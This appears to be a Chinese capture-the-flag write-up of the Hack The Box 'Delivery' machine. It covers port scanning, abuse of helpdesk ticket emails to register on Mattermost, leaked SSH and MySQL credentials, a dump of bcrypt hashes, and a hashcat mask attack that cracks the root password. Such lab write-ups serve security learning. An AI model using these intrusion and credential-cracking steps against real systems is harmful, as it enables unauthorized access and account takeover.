Delivery(Weak Credentials)

服务探测

开放端口

┌──(root㉿rock)-[~]
└─# nmap -p- --open 10.10.10.222                                          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 11:35 EDT
Nmap scan report for 10.10.10.222
Host is up (0.0056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 5.10 seconds

详细端口信息

┌──(root㉿rock)-[~]
└─# nmap -sV -Pn -A -O 10.10.10.222 -p 22,80,8065                         
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 11:36 EDT
Nmap scan report for 10.10.10.222
Host is up (0.0028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Mon, 18 Jul 2022 15:33:34 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: eys7qraci3yxzgttodhwutc5nh
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Mon, 18 Jul 2022 15:37:04 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Mon, 18 Jul 2022 15:37:04 GMT
|_    Content-Length: 0

两个web服务

80爆破

┌──(root㉿rock)-[~]
└─# python3 /root/dirsearch/dirsearch.py -e* -t 30 -u http://10.10.10.222/                         

  _|. _ _  _  _  _ _|_    v0.4.2.6
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 

Output File: /root/dirsearch/reports/10.10.10.222/__22-07-18_23-17-32.txt

Target: http://10.10.10.222/

[23:17:32] Starting: 
[23:17:50] 301 -  185B  - /assets  ->  http://10.10.10.222/assets/          
[23:17:50] 403 -  571B  - /assets/                                          
[23:17:59] 301 -  185B  - /error  ->  http://10.10.10.222/error/            
[23:17:59] 200 -    1KB - /error/                                           
[23:18:04] 301 -  185B  - /images  ->  http://10.10.10.222/images/          
[23:18:04] 403 -  571B  - /images/
[23:18:04] 200 -   11KB - /index.html                                       
[23:18:42] 200 -  648B  - /README.MD                                        
                                                                             
Task Completed

看起来都是静态页面

查看80页面源代码,发现有一个delivery.htb域名

delivery.htb添加到hosts文件

10.10.10.222 delivery.htb

http://delivery.htb/#contact-us文字描述

Contact Us

For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.

查看网页源代码,又出现了一个域名helpdesk.delivery.htb

MatterMost server就是8065的web服务,一个登陆页面,需要邮箱账号,注册的账号需要在邮箱中确认,这在lab的环境下是不可能的,因为lab不通外网。

再次把helpdesk.delivery.htb添加到hosts文件

10.10.10.222 helpdesk.delivery.htb

尝试新建一个工单,返回文字

max, 

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 5838037.

If you want to add more information to your ticket, just email 5838037@delivery.htb.

Thanks,

Support Team

使用上面文字里提供的邮箱地址,到8065端口注册一个账号

用户名:5838037@delivery.htb

来到http://helpdesk.delivery.htb/tickets.php,输入我们之前创建ticket的邮箱和票据号码(5838037),这个时候就可以在网页上收到确认邮件:

此时页面文字变为:

---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=7i3surzbzqs3r1zhun8bkdtw3cjxmp1dpji4donhg7wpg8p96zhsh3ampd6ptatx&email=5838037%40delivery.htb ) --------------------- You can sign in from: --------------------- Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from: https://mattermost.com/download/#mattermostApps ( https://mattermost.com/download/#mattermostApps

点击上面确认URL,确认注册。此时我们有了一个可以登录8065服务的账号密码。

登录系统看到后台留言

System
9:25 AM

@root joined the team.
System
9:28 AM
@root updated the channel display name from: Town Square to: Internal
root
9:29 AM

@developers Please update theme to the OSTicket before we go live.  Credentials to the server are maildeliverer:Youve_G0t_Mail! 

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.

暴露一个凭据:maildeliverer:Youve_G0t_Mail!

可以使用ssh登录,拿到foodhold

┌──(root💀kali)-[~/htb/Delivery]
└─# ssh maildeliverer@10.10.10.222
The authenticity of host '10.10.10.222 (10.10.10.222)' can't be established.
RSA key fingerprint is SHA256:B+rlws5emnYTMuozSG7wYcAeGNraDgR918ttg3/BV9o.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.222' (RSA) to the list of known hosts.
maildeliverer@10.10.10.222's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ whoami
maildeliverer
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
dc0dc83c949...

提权

在opt文件夹发现一个项目文件夹

maildeliverer@Delivery:/opt$ ls
mattermost

opt文件夹一般不会有任何内容,如果出现了文件应该特别留意

在config文件夹找到一个mysql的连接凭据

 "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026re
adTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

连接mysql

maildeliverer@Delivery:~$ mysql -u mmuser -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> 

在users表找到root的加密凭据

ariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
7 rows in set (0.001 sec)


上面后台的留言中,说明密码是字符串PleaseSubscribe!的变体

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.

PleaseSubscribe!为前缀的密码

PleaseSubscribe!?d
PleaseSubscribe!?d?d
PleaseSubscribe!?d?d?d
PleaseSubscribe!?d?d?d?d

准备两个文件,一个源密码,一个掩码

┌──(root💀kali)-[~/htb/Delivery]
└─# cat hash.txt                             
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
                                                                                                                    
┌──(root💀kali)-[~/htb/Delivery]
└─# cat mask.txt 
PleaseSubscribe!?d
PleaseSubscribe!?d?d
PleaseSubscribe!?d?d?d
PleaseSubscribe!?d?d?d?d

使用hashcat破解

──(root💀kali)-[~/htb/Delivery]
└─# hashcat -m 3200 -a 3 hash.txt mask.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i3-4170 CPU @ 3.70GHz, 1084/2233 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Sep  6 03:57:22 2022 (1 sec)
Time.Estimated...: Tue Sep  6 03:57:23 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: PleaseSubscribe!?d?d [18]
Guess.Queue......: 2/4 (50.00%)
Speed.#1.........:       24 H/s (10.28ms) @ Accel:2 Loops:128 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12/100 (12.00%)
Rejected.........: 0/12 (0.00%)
Restore.Point....: 10/100 (10.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:896-1024
Candidate.Engine.: Device Generator
Candidates.#1....: PleaseSubscribe!19 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util: 91%

Started: Tue Sep  6 03:57:15 2022
Stopped: Tue Sep  6 03:57:24 2022

得到密码是:PleaseSubscribe!21

提权到root

maildeliverer@Delivery:~$ su root
Password: 
root@Delivery:/home/maildeliverer# whoami
root
root@Delivery:/home/maildeliverer# 
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,393评论 5 467
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,790评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,391评论 0 330
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,703评论 1 270
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,613评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,003评论 1 275
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,507评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,158评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,300评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,256评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,274评论 1 328
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,984评论 3 316
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,569评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,662评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,899评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,268评论 2 345
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,840评论 2 339

推荐阅读更多精彩内容